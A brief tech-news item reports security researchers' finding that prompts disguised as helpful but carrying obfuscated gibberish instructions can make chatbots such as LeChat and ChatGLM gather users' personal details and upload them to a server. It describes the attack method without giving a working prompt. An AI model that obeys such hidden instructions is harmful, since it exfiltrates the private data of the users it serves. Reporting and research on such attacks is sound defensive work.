The Risks of Including Personal Details in AI Chats
Security researchers have discovered a way to instruct AI chatbots to gather personal data from conversations and upload it to a server, raising concerns about privacy and security in AI chats. The researchers tested the method on two large language models, LeChat by French AI company Mistral and Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts which secretly contain malicious instructions obfuscated as gibberish only understandable by the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, these kinds of attacks are likely to become more widespread.
Latest News
WhatsApp for iOS Unveils Sleek New Profile Tab in Latest Update
1 hour ago
Samsung Pulls the Plug on Its $3,000 Tri-Fold Experiment After Only Three Months
1 hour ago
CERN's Upgraded Smasher Hits Milestone with 80th Particle Discovery
1 hour ago
Samsung Admits Privacy Comes at a Cost for Galaxy S26 Ultra’s Stunning Screen
2 hours ago
Todd Howard Wants You to Forget The Elder Scrolls 6 Even Exists
2 hours ago
Court Rules Apple Can Purge Apps at Will as Musi Loses Big
2 hours ago